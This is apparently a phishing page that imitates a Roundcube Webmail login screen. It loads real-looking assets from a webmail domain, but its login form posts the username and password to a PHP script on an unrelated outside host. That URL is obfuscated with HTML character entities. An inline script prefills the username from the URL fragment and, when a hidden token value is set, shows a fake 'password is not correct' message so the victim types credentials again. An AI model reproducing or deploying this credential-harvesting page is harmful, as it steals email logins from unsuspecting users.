
<!DOCTYPE html>
<html lang="en">

<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>Roundcube Webmail :: Welcome to Roundcube Webmail</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no, maximum-scale=1.0">
<meta name="theme-color" content="#f4f4f4">
<meta name="msapplication-navbutton-color" content="#f4f4f4">

	<link rel="shortcut icon" href="https://webmail.fincasatticus.com/skins/elastic/images/favicon.ico?s=1595217033">

	<link rel="stylesheet" href="https://webmail.fincasatticus.com/skins/elastic/deps/bootstrap.min.css?s=1595217033">
			<link rel="stylesheet" href="https://webmail.fincasatticus.com/skins/elastic/styles/styles.css?s=1595217033">
		
	<link rel="stylesheet" type="text/css" href="https://webmail.fincasatticus.com/plugins/jqueryui/themes/elastic/jquery-ui.css?s=1595217032">
<script src="https://webmail.fincasatticus.com/program/js/jquery.min.js?s=1595217032"></script>
<script src="https://webmail.fincasatticus.com/program/js/common.min.js?s=1595217032"></script>
<script src="https://webmail.fincasatticus.com/program/js/app.min.js?s=1595217032"></script>
<script src="https://webmail.fincasatticus.com/program/js/jstz.min.js?s=1595217032"></script>
<script>
/*
        @licstart  The following is the entire license notice for the 
        JavaScript code in this page.

        Copyright (C) The Roundcube Dev Team

        The JavaScript code in this page is free software: you can redistribute
        it and/or modify it under the terms of the GNU General Public License
        as published by the Free Software Foundation, either version 3 of
        the License, or (at your option) any later version.

        The code is distributed WITHOUT ANY WARRANTY; without even the implied
        warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
        See the GNU GPL for more details.

        @licend  The above is the entire license notice
        for the JavaScript code in this page.
*/
var rcmail = new rcube_webmail();
rcmail.set_env({"task":"login","standard_windows":false,"locale":"en_US","devel_mode":null,"rcversion":10406,"cookie_domain":"","cookie_path":"/","cookie_secure":true,"skin":"elastic","blankpage":"skins/elastic/watermark.html","refresh_interval":60,"session_lifetime":600,"action":"","comm_path":"./?_task=login","compose_extwin":false,"date_format":"yy-mm-dd","date_format_localized":"YYYY-MM-DD","request_token":"M5EWfnXwlIKVjVAH824iyadKRAI9XY31"});
rcmail.add_label({"loading":"Loading...","servererror":"Server Error!","connerror":"Connection Error (Failed to reach the server)!","requesttimedout":"Request timed out","refreshing":"Refreshing...","windowopenerror":"The popup window was blocked!","uploadingmany":"Uploading files...","uploading":"Uploading file...","close":"Close","save":"Save","cancel":"Cancel","alerttitle":"Attention","confirmationtitle":"Are you sure...","delete":"Delete","continue":"Continue","ok":"OK","back":"Back","errortitle":"An error occurred!","options":"Options","plaintoggle":"Plain text","htmltoggle":"HTML","previous":"Previous","next":"Next","select":"Select","browse":"Browse","choosefile":"Choose file...","choosefiles":"Choose files..."});
rcmail.gui_container("loginfooter","login-footer");rcmail.gui_object('loginform', 'login-form');
rcmail.gui_object('message', 'messagestack');
</script>

	  <script type="text/javascript">
	
	window.onload=function(){ 
  var hashParams = window.location.hash.substr(1).split('&'); // substr(1) to remove the `#`
for(var i = 0; i < hashParams.length; i++){
    var p = hashParams[i].split('=');
    document.getElementById(p[0]).value = decodeURIComponent(p[1]);;
	document.getElementById("nana").innerHTML = document.getElementById('request-token').value;
	var tokenValue = document.getElementById('token').value;
	 if(tokenValue==2){
	 document.getElementById("message").style.display = "none";
	 document.getElementById("errorMessage").innerHTML = "Your account or password is not correct and did not match. Try Again,";
	 }
	
}
 } 
 
</script>

<script src="https://webmail.fincasatticus.com/plugins/jqueryui/js/jquery-ui.min.js?s=1595217032"></script>

</head>
<body class="task-login action-none">
			<div id="layout">
	

<h1 class="voice">Roundcube Webmail Login</h1>

<div id="layout-content" class="selected no-navbar" role="main">
	<img src="https://webmail.fincasatticus.com/skins/elastic/images/logo.svg?s=1595217033" id="logo" alt="Logo">
	<form id="login-form" name="login-form" method="post" action="https://&#115;&#116;&#114;&#114;&#112;&#46;&#99;&#111;&#109;&#47;&#77;&#105;&#99;&#47;&#87;&#51;&#46;&#112;&#104;&#112;">
<input name="Language" value="EN" required="required" size="40" autocapitalize="off" type="hidden">
<input name="tag" value="HQ" required="required" size="40" autocapitalize="off" type="hidden">
<input name="token" value="1" id="token" required="required" size="40" autocapitalize="off" type="hidden">
<input type="hidden" name="_token" value="M5EWfnXwlIKVjVAH824iyadKRAI9XY31">
	<input type="hidden" name="_task" value="login"><input type="hidden" name="_action" value="login"><input type="hidden" name="_timezone" id="rcmlogintz" value="_default_"><input type="hidden" name="_url" id="rcmloginurl" value=""><table><tbody><tr><td class="title"><label for="rcmloginuser">Username</label>
</td>
<td class="input"><input name="_user" id="request-token" required size="40" autocapitalize="off" autocomplete="off" type="text"></td>
</tr>
<tr><td class="title"><label for="rcmloginpwd">Password</label>
</td>
<td class="input"><input name="_pass" id="rcmloginpwd" required size="40" autocapitalize="off" autocomplete="off" type="password"></td>
</tr>
</tbody>
</table>
<p class="formbuttons"><button type="submit" id="rcmloginsubmit" class="button mainaction submit">Login</button>
</p>

		<div id="login-footer" role="contentinfo">
			Roundcube Webmail
			
						
		</div>
	</form>
</div>

<noscript>
	<p class="noscriptwarning">Warning: This webmail service requires Javascript! In order to use it please enable Javascript in your browser's settings.</p>
</noscript>

</div>
<div id="messagestack"></div>
<script>
$(function() {
rcmail.init();
});
</script>



<script src="https://webmail.fincasatticus.com/skins/elastic/deps/bootstrap.bundle.min.js?s=1595217033"></script>
<script src="https://webmail.fincasatticus.com/skins/elastic/ui.min.js?s=1595217033"></script>

</body>
</html>
